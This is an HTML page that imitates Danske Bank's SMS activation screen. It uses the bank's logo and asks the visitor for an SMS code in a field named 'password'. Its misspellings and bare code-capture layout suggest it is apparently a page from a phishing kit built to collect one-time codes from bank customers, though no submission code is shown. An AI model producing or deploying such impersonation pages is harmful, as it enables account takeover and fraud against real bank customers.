<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>otp</title>
    <link rel="stylesheet" href="otp.css">
</head>

<body>
    <div class="otp-container">
        <div class="logo-container">
            <img src="https://upload.wikimedia.org/wikipedia/commons/9/9f/Danske_Bank_logo.svg" alt="Danske_Bank_logo">
        </div>
        <div class="idetification-container">
            Danske Bank Identification
        </div>
        <div class="activition-options">
            &#60; See more activation options
        </div>
        <div class="text-message">
            Activate by text message (SMS)
        </div>
        <div class="form-container">
            <label for="password">Enter Sms Activision Code</label><br>
            <div class="empty"></div>
            <input type="number" name="password" id="password">
        </div>
        <div class="button-container">

            <button class="button button1">Cancel</button>
            <button class="button button2">Submit</button>
        </div>
        <div class="last-message">
            Did you not receive an SMS? <a href="#">Send it again</a>
        </div>
    </div>
</body>

</html>